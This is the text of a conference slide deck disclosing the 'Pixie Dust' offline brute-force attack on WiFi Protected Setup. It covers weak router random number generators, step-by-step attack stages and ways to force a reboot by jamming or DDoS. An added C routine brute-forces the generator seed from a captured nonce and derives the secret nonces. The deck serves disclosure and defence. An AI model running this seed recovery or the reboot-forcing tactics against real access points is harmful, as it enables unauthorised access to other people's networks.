WPS_offline_bruteforce_RNG_Dominique_Bongard.pdf
Offline bruteforce attack on WiFi Protected Setup
Dominique Bongard, Founder, 0xcite, Switzerland, @reversity
§ Protocol aiming at easily connecting to protected WiFi networks
§ Two main modes: Push-Button and 8-digit PIN code
§ Gives the WPA passphrase to stations providing the right PIN
§ Poor design and implementation
Stefan Viehböck
§ Brute force each half of the PIN
§ Maximum 10,000 tries + 1,000 tries
§ No limit on the number of tries in many APs
§ Takes a few hours (depends on the AP)
§ Largely slowed down in new devices (lock-out)
§ Many APs still sold with WPS PIN activated
STA Nonce | E-Hash1 | E-Hash2 | HMAC
E-Hash1: AES(HMAC(PIN1),E-S1)
E-Hash2: AES(HMAC(PIN2),E-S2)
§ If we can guess E-S1 and E-S2, we can then brute force PIN1 and PIN2 offline!
§ Pixie dust attack!
§ Usually with pseudo-random generators (PRNG)
§ Often insecure PRNG
§ No or low entropy
§ Small state (32 bits)
§ Can the PRNG state be recovered?
```c
#include <stdlib.h>  /* RAND_MAX */

int rand_r( unsigned int *seed )
{
    unsigned int s = *seed;
    unsigned int uret;
    int retval;                          // value returned to the caller

    s = (s * 1103515245) + 12345;        // permutate seed
    uret = s & 0xffe00000;               // Only use top 11 bits
    s = (s * 1103515245) + 12345;        // permutate seed
    uret += (s & 0xfffc0000) >> 11;      // Only use top 14 bits
    s = (s * 1103515245) + 12345;        // permutate seed
    uret += (s & 0xfe000000) >> (11+14); // Only use top 7 bits
    retval = (int)(uret & RAND_MAX);
    *seed = s;
    return retval;
}
```
AP Nonce | Description | PK
§ Linear Congruential Generator
§ 32 bits state
§ No external entropy
§ E-S1 and E-S2 generated right after the Nonce
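The consequence of these four properties, as an added example (not code from the talk or from any vendor firmware): when the public nonce and the secret nonces are drawn from one 32-bit state, a firmware reviewer can test whether an observed nonce is reproducible from a seed, and if it is, the values drawn next are fixed as well. The byte packing in `weak_fill`, `RAND_MAX` = 0x7fffffff, the function names and the sample seed are assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* One LCG step, constants taken from the rand_r listing above. */
static uint32_t lcg(uint32_t s) { return s * 1103515245u + 12345u; }

/* Output function of the listing: 11 + 14 + 7 bits from three LCG steps.
 * ASSUMPTION: RAND_MAX is 0x7fffffff. */
static uint32_t weak_rand(uint32_t *state) {
    uint32_t s = lcg(*state), r = s & 0xffe00000u;
    s = lcg(s); r += (s & 0xfffc0000u) >> 11;
    s = lcg(s); r += (s & 0xfe000000u) >> 25;
    *state = s;
    return r & 0x7fffffffu;
}

/* ASSUMPTION: buffers are filled one byte per call (low 8 bits). */
static void weak_fill(uint8_t *buf, size_t n, uint32_t *state) {
    for (size_t i = 0; i < n; i++) buf[i] = (uint8_t)weak_rand(state);
}

/* Model of the flawed ordering: public nonce first, then the two
 * secret nonces, all from the same state and with no added entropy. */
void model_enrollee(uint32_t seed, uint8_t nonce[16],
                    uint8_t es1[16], uint8_t es2[16]) {
    weak_fill(nonce, 16, &seed);
    weak_fill(es1, 16, &seed);
    weak_fill(es2, 16, &seed);
}

/* Audit check: is the observed nonce reproducible from a seed in [lo, hi]?
 * Returns 1 and writes the 2 x 16 bytes that follow the nonce if so. */
int nonce_is_predictable(const uint8_t nonce[16], uint32_t lo, uint32_t hi,
                         uint8_t es1[16], uint8_t es2[16]) {
    for (uint64_t seed = lo; seed <= hi; seed++) {
        uint32_t st = (uint32_t)seed;
        size_t i = 0;
        while (i < 16 && (uint8_t)weak_rand(&st) == nonce[i]) i++;
        if (i < 16) continue;          /* rejected at first mismatching byte */
        weak_fill(es1, 16, &st);
        weak_fill(es2, 16, &st);
        return 1;
    }
    return 0;
}
```

A generator that passes this check for any seed range fails the review: secrets must come from a source whose state cannot be reconstructed from public output.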
§ Do the WPS protocol up to message M3
§ Get the Nonce from M1
§ Bruteforce the state of the PRNG
§ Compute E-S1 and E-S2 from the state
§ Decrypt E-Hash1 and E-Hash2
§ Bruteforce PIN1 and PIN2
§ Do the full WPS protocol and get the passphrase
§ Linear Feedback Shift Register (LFSR)
§ Broken
§ Doesn't matter, the keys are always NULL!!
§ Some APs have the same state at each boot
§ Make a list of common states after reboot
§ Attack the AP right after boot
§ Trigger the breakers
§ DDOS the AP
§ Jam the signal until the target reboots the AP
§ Looks okay
§ Uses /dev/random
§ Found in Atheros SDK
§ But you never know
§ Several papers attack the entropy of the Linux PRNG in embedded systems
§ It's complicated
§ Many of the implementations are the reference code for the chipset
§ Only the GUI is reskinned
§ Therefore many brands are affected
§ Many vendors use different chipsets
§ Even for the same model number
§ Disable WPS now!
§ Reverse engineers: Check other APs for bad PRNGs
§ Cryptographers: Check if good PRNGs are okay